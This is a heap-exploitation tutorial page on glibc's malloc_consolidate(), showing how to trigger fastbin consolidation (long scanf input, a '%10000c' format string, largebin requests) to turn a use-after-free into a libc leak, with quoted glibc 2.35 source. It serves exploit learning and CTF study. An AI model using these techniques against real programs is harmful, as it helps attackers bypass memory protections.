malloc_consolidate()

Consolidating fastbins

Earlier, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true, but they don't consolidate automatically; in order for them to consolidate, the function malloc_consolidate() has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.

Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!

If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate(), they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd and bk will point to a location in malloc_state, which is contained within libc.

This means that the more important thing for us to know is how we can trigger a largebin consolidation.

Some of the most important ways include:

  • Inputting a very long number into scanf (around 0x400 characters long)

    • This works because the code responsible for it manages a scratch_buffer and assigns it 0x400 bytes, but uses malloc when the data is too big (along with realloc if it gets even bigger than the heap chunk, and free at the end, so it works to trigger those functions too - great for triggering hooks!).

  • Inputting something along the lines of %10000c into a format string vulnerability also triggers a chunk to be created

Both of these work because a largebin allocation triggers malloc_consolidate.By checking the calls to the function in malloc.c (2.35), we can find other triggers.

It's possible for earlier or later glibc versions to have a greater or lesser number of calls to a specific function, so make sure to check for your version! You may find another way exists.

The most common and most important trigger, a call to malloc() requesting a chunk of largebin size will trigger a call to malloc_consolidate().

/*
   If this is a large request, consolidate fastbins before continuing [...]
 */

else
  {
    idx = largebin_index (nb);
    if (atomic_load_relaxed (&av->have_fastchunks))
      malloc_consolidate (av);
  }

There is another call to it in the section use_top. This section is called when the top chunk has to be used to service the request. The first if condition checks if the top chunk is large enough to service the request:

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    av->top = remainder;
    set_head (victim, nb | PREV_INUSE |
              (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
}

If not, the next condition checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate to attempt to regain space to service the request!

else if (atomic_load_relaxed (&av->have_fastchunks))
{
    malloc_consolidate (av);
    /* restore original bin index */
    if (in_smallbin_range (nb))
        idx = smallbin_index (nb);
    else
        idx = largebin_index (nb);
}

So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate().

(If both conditions fail, _int_malloc falls back to esssentially using mmap to service the request).

Last updated